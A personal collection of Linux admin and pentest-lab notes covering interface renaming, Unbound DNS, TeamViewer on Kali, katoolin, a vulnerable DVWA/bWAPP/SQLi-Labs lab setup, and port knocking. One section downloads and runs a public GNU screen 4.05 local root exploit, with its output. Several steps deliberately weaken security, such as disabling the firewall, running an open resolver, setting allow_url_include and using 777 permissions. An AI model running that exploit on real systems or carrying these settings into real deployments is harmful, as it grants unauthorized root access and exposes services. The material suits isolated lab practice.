Change default network name (ens33) to old “eth0” on Ubuntu

SOURCE: https://www.itzgeek.com/how-tos/mini-howtos/change-default-network-name-ens33-to-old-eth0-on-ubuntu-16-04.html

# ifconfig

ens33     Link encap:Ethernet  HWaddr 00:0c:29:bb:8b:8e

          inet addr:10.0.10.131  Bcast:10.0.10.255  Mask:255.255.255.0

          inet6 addr: fe80::20c:29ff:febb:8b8e/64 Scope:Link

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:150 errors:0 dropped:0 overruns:0 frame:0

          TX packets:82 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000

          RX bytes:20532 (20.5 KB)  TX bytes:10858 (10.8 KB)

# dmesg | grep -i eth

[    2.196929] e1000 0000:02:01.0 eth0: (PCI:66MHz:32-bit) 00:0c:29:bb:8b:8e

[    2.196938] e1000 0000:02:01.0 eth0: Intel(R) PRO/1000 Network Connection

[    2.204129] e1000 0000:02:01.0 ens33: renamed from eth0

# nano /etc/default/grub

add this

GRUB_CMDLINE_LINUX=”net.ifnames=0 biosdevname=0″

# grub-mkconfig -o /boot/grub/grub.cfg

# cat /etc/network/interfaces

auto lo

iface lo inet loopback

auto eth0

iface eth0 inet static

        address 10.0.10.131

        netmask 255.255.255.0

        dns-nameservers 8.8.8.8

        gateway 10.0.10.1

# reboot

# ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:bb:8b:8e

          inet addr:10.0.1.11  Bcast:10.0.10.255  Mask:255.255.255.0

          inet6 addr: fe80::20c:29ff:febb:8b8e/64 Scope:Link

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:230 errors:0 dropped:0 overruns:0 frame:0

          TX packets:136 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000

          RX bytes:29638 (29.6 KB)  TX bytes:19317 (19.3 KB)

Unbound DNS Server Installation

update and upgrade

# apt-get update

# apt-get upgrade -y

-disable firewall

# ufw disable

-set correct date and timezone

# rm /etc/localtime

# ln -s /usr/share/zoneinfo/Asia/Jakarta /etc/localtime

-disable dnsmasq

# cat /etc/NetworkManager/NetworkManager.conf

[main]

plugins=ifupdown,keyfile,ofono

#dns=dnsmasq

[ifupdown]

managed=false

-install unbound dns

# apt-get install unbound

-set cronjob to download named.root automatically

# wget https://www.internic.net/domain/named.root -o /etc/unbound/root.hints

# cat /etc/cron.d/named-root

0 * * * * root wget -c http wget -c http://www.internic.net/domain/named.root -O /etc/unbound/root.hints

# crontab /etc/cron.d/named-root

# cat unbound.conf

server:

    interface: 0.0.0.0

    interface: ::0

    access-control: 0.0.0.0/0 allow

#    access-control: 127.0.0.0 allow

#    access-control: 2001:db8:dead:beef::/48 allow

    # unbound optimisation

    num-threads: 4

    msg-cache-slabs: 16

    rrset-cache-slabs: 16

    infra-cache-slabs: 16

    key-cache-slabs: 16

    outgoing-range: 206

    so-rcvbuf: 4m

    so-sndbuf: 4m

    so-reuseport: yes

    rrset-cache-size: 100m

    msg-cache-size: 50m

    # unbound security

    do-ip4: yes

    do-ip6: yes

    do-udp: yes

    do-tcp: yes

    cache-max-ttl: 86400

    cache-min-ttl: 3600

    hide-identity: yes

    hide-version: yes

    minimal-responses: yes

    prefetch: yes

    use-caps-for-id: yes

    verbosity: 1

    harden-glue: yes

    harden-dnssec-stripped: yes

    # download from ftp://ftp.internic.net/domain/named.cache

    root-hints: “/etc/unbound/root.hints”

    private-domain: “ngtrain.com“

    private-address: 10.0.10.0/24

#  private-address: 2001:db8:dead:beef::/48

    local-data: “vc.ngtrain.com.  IN A 10.0.10.80″

    local-data-ptr: “10.0.10.80  vc.ngtrain.com“

forward-zone:

    name: “.”

    forward-addr: 1.1.1.1

    forward-addr: 9.9.9.9

include: “/etc/unbound/unbound.conf.d/*.conf”

# reboot

Change Shell Prompt color

SOURCE: https://linoxide.com/how-tos/change-linux-shell-prompt-with-different-colors/

go to http://bashrcgenerator.com

for example you want to change username and hostname like this

mario@mycomputer

add into /etc/skel/.bashrc
# If root then red text prompt otherwise green
CURRENTUSER=`whoami`
if [ “$CURRENTUSER” = “root” ]; then
PS1=’\[\033[38;5;1m\]\u\[$(tput sgr0)\]\[\033[38;5;15m\]@\[$(tput sgr0)\]\[\033[38;5;22m\]\h\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;4m\]\w\[$(tput sgr0)\]\[\033[38;5;15m\]#\[$(tput sgr0)\]’
else
PS1=’\[\033[38;5;2m\]\u\[$(tput sgr0)\]\[\033[38;5;15m\]@\[$(tput sgr0)\]\[\033[38;5;1m\]\h\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;4m\]\w\[$(tput sgr0)\]\[\033[38;5;15m\]\\$\[$(tput sgr0)\]’
fi

TeamViewer installation on Kali

-install sddm as default X windows because default X windows in Kali didn’t allow remote TeamViewer without login GUI first

# apt-get install sddm

# dpkg –add-architecture i386

# apt-get update

# wget http://download.teamviewer.com/download/teamviewer_i386.deb

# dpkg -i –force-depends teamviewer_i386.deb

# apt-get install -f

# teamviewer –daemon start

-get current TeamViewer id either from GUI or CLI

# teamviewer –info print version, status, id

 TeamViewer                           12.0.71510  (DEB)

 teamviewerd status                   ● teamviewerd.service – TeamViewer remote control daemon

   Loaded: loaded (/etc/systemd/system/teamviewerd.service; enabled; vendor preset: disabled)

   Active: active (running) since Sun 2017-03-19 09:02:02 PDT; 9min ago

  Process: 1140 ExecStart=/opt/teamviewer/tv_bin/teamviewerd -d (code=exited, status=0/SUCCESS)

 Main PID: 1162 (teamviewerd)

    Tasks: 12 (limit: 4915)

   CGroup: /system.slice/teamviewerd.service

           └─1162 /opt/teamviewer/tv_bin/teamviewerd -d

Mar 19 09:02:00 kali2 systemd[1]: Starting TeamViewer remote control daemon…

Mar 19 09:02:02 kali2 systemd[1]: Started TeamViewer remote control daemon.

 TeamViewer ID:                        798024234

-run teamviewer gui

# teamviewer

click Connection/Setup Unattended Access

click Next

click Finish

Now you can remotely connect to your Linux TeamViewer

NOTE:

-every time you adding device or login to new device while login to your TeamViewer a/c. TeamViewer will ask your permission by sending an email with title “Device authorization needed”

Just click a link in that email to add your device into your TV a/c

MichaCry an Automatic Pentesting Tools

SOURCE: https://wreckitkenny.net/2017/02/24/michacry-an-automated-pentesting-tools-part-1/#comment-15

 

# cd /root

# apt-get install figlet -y

# git clone https://github.com/wreckitkenny/MichaCry.git

# cd MichaCry

# chmod +x michaCry.sh personalCom.sh setup.sh webApp.sh wireless.sh

# vi setup.sh

change this part

git clone https://github.com/night-m4t3-t34m/deltax-fluxion.git wireless/fluxion

# vi michaCry.sh

change

espeak

to

echo

# ./setup.sh

# ./michaCry.sh

screen root privillege escalation

NOTE:

-this exploit will make normal user become root

-tried working with Ubuntu 13.x with old patches but not with Debian 8 or Parrot with latest patches

SOURCE: https://github.com/XiphosResearch/exploits/tree/master/screen2root

If you don’t have screen 4.05 then you need to install or compile yourself

# apt-get install screen

or

# cd /root

# wget https://ftp.gnu.org/gnu/screen/screen-4.5.0.tar.gz

# cd screen-4.5.0

# apt-get install libncurses5-dev

# ./configure;make;make install

# screen -v

Screen version 4.05.00 (GNU) 10-Dec-16

# su – user1

$ wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/screen2root/screenroot.sh

$ chmod +x screenroot.sh

$ ./screenroot.sh

~ gnu/screenroot ~

[+] First, we create our shell and library…

[+] Now we create our /etc/ld.so.preload file…

[+] Triggering…

‘ from /etc/ld.so.preload cannot be preloaded: ignored.

[+] done!

No Sockets found in /tmp/screens/S-user1.

# whoami

root

Installing FireFox on Debian

SOURCE: https://blog.sleeplessbeastie.eu/2016/03/21/how-to-use-recent-version-of-firefox-in-debian-jessie/

# wget -q -O – http://mozilla.debian.net/archive.asc | sudo apt-key add –

# echo “deb http://mozilla.debian.net/ jessie-backports firefox-release” >> /etc/apt/sources.list.d/mozilla-firefox.list

# cat /etc/apt/preferences.d/mozilla-firefox

Package: *

Pin: origin mozilla.debian.net

Pin-Priority: 501

# apt-get update

# apt-cache policy firefox

firefox:

  Installed: 51.0.1-3

  Candidate: 51.0.1-3

  Version table:

 *** 51.0.1-3 1001

       1001 http://mirrordirector.archive.parrotsec.org/parrot stable/main amd64 Packages

        100 /var/lib/dpkg/status

     51.0.1-3~bpo80+1 501

        501 http://mozilla.debian.net jessie-backports/firefox-release amd64 Packages

# apt-get install firefox -y

Installing Kali tool on Debian

We need katoolin for that purpose

# cd /root

# git clone https://github.com/LionSec/katoolin.git

# cd katoolin

# ln -s katoolin.py katoolin

# chmod +x katoolin

# ./katoolin

1) Add Kali repositories & Update

2) View Categories

3) Install classicmenu indicator

4) Install Kali menu

5) Help

kat > 1

1) Add kali linux repositories

2) Update

3) Remove all kali linux repositories

4) View the contents of sources.list file

What do you want to do ?> 1

1) Add kali linux repositories

2) Update

3) Remove all kali linux repositories

4) View the contents of sources.list file

What do you want to do ?> 2

1) Add kali linux repositories

2) Update

3) Remove all kali linux repositories

4) View the contents of sources.list file

What do you want to do ?> back

1) Add Kali repositories & Update

2) View Categories

3) Install classicmenu indicator

4) Install Kali menu

5) Help

kat > 2

1) Information Gathering                        8) Exploitation Tools

2) Vulnerability Analysis                       9) Forensics Tools

3) Wireless Attacks                             10) Stress Testing

4) Web Applications                             11) Password Attacks

5) Sniffing & Spoofing                          12) Reverse Engineering

6) Maintaining Access                           13) Hardware Hacking

7) Reporting Tools                              14) Extra

0) All

Select a category or press (0) to install all Kali linux tools .

kat > 0

Do you want to continue? [Y/n]

1) Add Kali repositories & Update

2) View Categories

3) Install classicmenu indicator

4) Install Kali menu

5) Help

kat > 3

Do you want to install classicmenu indicator ? [y/n]> y

1) Add Kali repositories & Update

2) View Categories

3) Install classicmenu indicator

4) Install Kali menu

5) Help

kat > 4

Do you want to install Kali menu ? [y/n]> y

Installing Vulnerable bWAPP, DVWA, Joomla, Mutillidae2, SQLi-Labs, XAMPP, WordPress on TurnKey LAMP

SOURCE: https://www.hempstutorials.co.uk/setup-a-vulnerable-lamp-server/

 

Download and install TurnKey LAMP ova from

https://www.turnkeylinux.org/lampstack

set VBox Settings/Display/Screen/Video Memory to 6MB

set NIC1 to Bridge in VBox

Set NIC2 to Host only

click Advanced Menu

select Networking, click Select

Set eth0 to dhcp and eth1 to static

XAMPP

# cd /root

# apt list –installed

find apache and mysql packages name there

# service mysql stop

# apt-get purge mysql-server mysql-client mysql-common

# apache2ctl stop

# apt-get purge apache2 apache2-utils apache2.2-bin

# apt-get autoremove

# apt-get autoclean

-download xampp

# wget https://www.apachefriends.org/xampp-files/5.6.30/xampp-linux-x64-5.6.30-0-installer.run

# chmod 755 xampp-linux-x64-5.6.30-0-installer.run

# ./xampp-linux-x64-5.6.30-0-installer.run

————————————————————————–

Welcome to the XAMPP Setup Wizard.

————————————————————————–

Select the components you want to install; clear the components you do not want

to install. Click Next when you are ready to continue.

   XAMPP Core Files : Y (Cannot be edited)

   XAMPP Developer Files [Y/n] :

   Is the selection above correct? [Y/n]:

Installation Directory

   XAMPP will be installed to /opt/lampp

   Press [Enter] to continue:

Setup is now ready to begin installing XAMPP on your computer.

   Do you want to continue? [Y/n]:

# cd /opt/lampp

# sed -i s/’local’/’all granted’/ etc/extra/httpd-xampp.conf

# lampp start

NOTE:

-to restart apache only

# /opt/lampp/bin/apachectl restart

-apache docs location on /opt/lampp/htdocs

bWAPP (Buggy Web Application)

# cd /root

# wget https://sourceforge.net/projects/bwapp/files/latest/download?source=files

# mkdir -p /opt/lampp/htdocs/bwapp

# mv download?source=files bwapp/bWAPP_latest.zip /opt/lampp/htdocs/bwapp/bwapp.zip

# cd /opt/lampp/htdocs/bwapp

# unzip bwapp.zip

# rm bwapp.zip

# vi bWAPP/admin/settings.php

set this part

$db_password = “”;

# cd bWAPP

# chmod 777 documents images passwords

-open your browser and go to http://10.0.1.44/bwapp/bWAPP/install.php

click on here

go to http://10.0.1.44/bwapp/bWAPP/login.php

L: bee

P: bug

DVWA

-download dvwa

# cd /root

# git clone https://github.com/ethicalhack3r/DVWA.git

# mv DVWA /opt/lampp/htdocs/dvwa

# cd /opt/lampp/htdocs/dvwa

# chmod 766 hackable/uploads

# chown root:root hackable/uploads

# chmod 766 external/phpids/0.6/lib/IDS/tmp/phpids_log.txt

go to https://www.google.com/recaptcha/intro/index.html and click Get reCAPTCHA

Sign-in with your gmail account

click Continue

click Get reCAPTCHA

on Label and Domains type your domain i.e: domain.com

click Register

You will get Site and Secret key

# cd /opt/lampp/htdocs/dvwa/config

# cp -p config.inc.php config.inc.php.bak

# vi config.inc.php

-set your mysql root password

$_DVWA[ ‘db_password’ ] = ‘Passw0rd’;

-insert Site > public key and Secret > private key into this part

$_DVWA[ ‘recaptcha_public_key’ ]  = ‘6LdaMRYUAAAAAGH_Wjgn15xUmdcXTMP9YpBJ7y3n1’;

$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdaMRYUAAAAALsTFuYgrGbeozX2efE3EOz11T5x1’;

Set “allow_url_include = On”

# sed -i s/’allow_url_include=Off’/’allow_url_include=On’/ /opt/lampp/etc/php.ini

# /opt/lampp/bin/apachectl restart

go to http://10.0.1.44/dvwa/

click Create/Reset Database

go to http://10.0.1.44/dvwa/login.php

L: admin

P: password

JOOMLA

# cd /root

# wget https://downloads.joomla.org/cms/joomla3/3-6-5/joomla_3-6-5-stable-full_package-zip?format=zip

# mv joomla_3-6-5-stable-full_package-zip\?format\=zip joomla-3.6.5.zip

# unzip joomla-3.6.5.zip -d joomla

# mv joomla /opt/lampp/htdocs

# cd /opt/lampp

# sed -i s/’display_errors=On’/’display_errors=Off’/ etc/php.ini

# sed -i s/’output_buffering=4096’/’output_buffering=Off’/ etc/php.ini

# cd /opt/lampp/htdocs/joomla/

# cp installation/model/configuration.php .

# chmod 777 configuration.php

# /opt/lampp/bin/apachectl restart

go to http://10.0.1.44/joomla/installation/index.php

Configuration

Select Langunage: English (United States)

Site Name: joomla

Description:

Site Offline: Yes

Administrator Email: admin@gmail.com

Administrator Username: root

Administrator Password:

Confirm Administrator Password:

click Next

Database

Database Type: MySQLi

Host Name: localhost

Username: root

Password:

Database Name: joomla

Table Prefix: j00mla_

Old Database Process: Backup

click Next

FTP

click Next

Overview

Install Sample Data: Learn Joomla English (GB) Sample Data

Email Configuration: No

click Install

click Remove installation folder

if you got error

# cd /opt/lampp/htdocs/joomla

# rm -rf installation

# chmod 644 configuration.php

go to http://10.0.1.44/joomla/

L: root

P:

NOWASP Mutillidae 2

# cd /root

# apt-get install software-properties-common python-software-properties php5-curl -y

# wget https://sourceforge.net/projects/mutillidae/files/latest/download?source=files

# mv download\?source\=files mutillidae.zip

# unzip mutillidae.zip

# mv mutillidae /opt/lampp/htdocs/

# cd /opt/lampp/htdocs/mutillidae

# vi classes/MySQLHandler.php

set your MySQL password here

        static public $mMySQLDatabasePassword = “”;

-only allow access from your network

# vi .htaccess

Allow from 10.0.1.0/24

# /opt/lampp/bin/apachectl restart

go to http://10.0.1.44/mutillidae

click setup/reset the DB

click OK

SQLi-Labs

# cd /root

# wget http://github.com/Audi-1/sqli-labs/archive/master.zip

# unzip master.zip

# mv sqli-labs-master /opt/lampp/htdocs/sqli

# cd /opt/lampp/htdocs/sqli

# vi sql-connections/db-creds.inc

set mysql password i.e.

$dbpass =”;

open browser and go to http://10.0.1.44/sqli

click Setup/reset Database for labs

WORDPRESS

NOTE:

UBUNTU

-because TurnKey LAMPP doesn’t have required gcc for compiling pcre lib, we need to do this in other Ubuntu server.

After compiling then copy the lib into 10.0.1.44 TurnKey LAMPP

download pcre

# cd /root

# wget ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-8.40.tar.bz2

# bunzip pcre-8.40.tar.bz2

# tar xf pcre-8.40.tar

# cd /pcre-8.40

# ./configure –prefix=/tmp –enable-utf8 –enable-unicode-properties ; make ; make install

# cd /tmp

# tar cf lib.tar lib

# scp lib.tar root@10.0.1.44/tmp

TURNKEY LAMPP
-copy lib into /opt/lampp/lib
# cd /opt/lampp/lib
# cp /tmp/lib/* .

-create empty wordpress db

go to http://10.0.1.44/phpmyadmin

click New on top left

Create database: wordpress

click Create

# git clone https://github.com/WordPress/WordPress.git

# mv WordPress /opt/lampp/htdocs/

# cd /opt/lampp/htdocs

# mv WordPress wordpress

# cd /opt/lampp/htdocs/wordpress

go to http://10.0.1.44/wordpress

click Let’s go!

Database Name: wordpress

Username: root

Password: Passw0rd

Database Host: localhost

Table Prefix: wp_

click Submit

You will get warning “Sorry, but I can’t write the wp-config.php file”.

Paste the content shown into wp-config.php

# vi wp-config.php

click  “Run the install”

Information needed

Site Title: wordpress

Username: root

Password: Passw0rd

Your Email:

Search Engine Visibility:

click Install WordPress

NOTE:

-you can go to http://10.0.1.44/wordpress/wp-admin/ for admin purposes

Create xampp startup script

# cat /etc/init.d/lampp

#! /bin/sh

### BEGIN INIT INFO

# Provides:             xampp

# Required-Start:       $remote_fs $syslog

# Required-Stop:        $remote_fs $syslog

# Default-Start:        2 3 4 5

# Default-Stop:         0 1 6

# Short-Description: Execute the xampp command.

# Description:

### END INIT INFO

PATH=/sbin:/usr/sbin:/bin:/usr/bin

case “$1” in

  start)

        /opt/lampp/lampp start

        ;;

  restart|reload|force-reload)

        /opt/lampp/lampp restart

        ;;

  stop)

        /opt/lampp/lampp stop

        ;;

  status)

        /opt/lampp/lampp status

        ;;

  *)

        echo “Usage: $0 start|stop|restart|status”

        ;;

esac

# chmod 755 /etc/init.d/lampp

# insserv -d /etc/init.d/lampp

# systemctl enable lampp

Port Knocking

BY using port knocking, we can open or close the port if we know the knock order

VM: KALI2 (Server) KALI2 (Client)

KALI2 (Server)
# apt-get install knockd -y
# cat /etc/default/knockd
START_KNOCKD=1

# cat /etc/knockd.conf
[options]
UseSyslog
Interface=eth1
#change eth1 accordingly
[openSSH]
sequence = 7000,8000,9000
seq_timeout = 5
command = /sbin/iptables -I INPUT -s %IP% -p tcp –dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9000,8000,7000
seq_timeout = 5
command = /sbin/iptables -D INPUT -s %IP% -p tcp –dport 22 -j ACCEPT
tcpflags = syn

# iptables -A INPUT -i lo -j ACCEPT
# iptables -A INPUT -m conntrack –ctstate ESTABLISHED,RELATED -j ACCEPT
# iptables -A INPUT -p tcp –dport 22 -j REJECT
# iptables -S
# mkdir /etc/iptables
# iptables-save > /etc/iptables/rules.v4
# iptables-restore < /etc/iptables/rules.v4
-if using ip6
# ip6tables-save > /etc/iptables/rules.v6
# ip6tables-restore < /etc/iptables/rules.v6
# service knockd start

KALI2 (Client)
-nmap shown ssh port filtered
# nmap 10.0.1.12
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds

# apt-get install knockd -y
# ssh root@ 10.0.1.12
connection refused
# knock 10.0.1.12 7000 8000 9000
# ssh root@ 10.0.1.12
connection successful
# knock 10.0.1.12 9000 8000 7000
# ssh root@ 10.0.1.12
connection refused